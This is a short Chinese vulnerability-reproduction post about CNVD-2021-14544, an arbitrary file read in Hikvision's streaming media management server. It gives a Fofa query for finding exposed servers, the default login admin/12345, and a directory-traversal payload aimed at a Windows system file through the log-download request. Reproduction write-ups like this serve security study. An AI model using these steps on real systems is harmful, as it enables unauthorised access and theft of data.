(CNVD-2021-14544)海康威视流媒体管理服务器任意文件读取【复现】

简介

海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。

漏洞说明

杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞和任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。

漏洞复现

Fofa搜索标题:

title="流媒体管理服务器"

(CNVD-2021-14544)海康威视流媒体管理服务器任意文件读取【复现】_第1张图片
找到存在弱口令的后台:

admin/12345

(CNVD-2021-14544)海康威视流媒体管理服务器任意文件读取【复现】_第2张图片
在日志下载中进行抓包:

构造payload:

../../../../../../../windows/system32/drivers/etc/hosts

可进行下载。

(CNVD-2021-14544)海康威视流媒体管理服务器任意文件读取【复现】_第3张图片

你可能感兴趣的:(漏洞复现,安全漏洞,安全)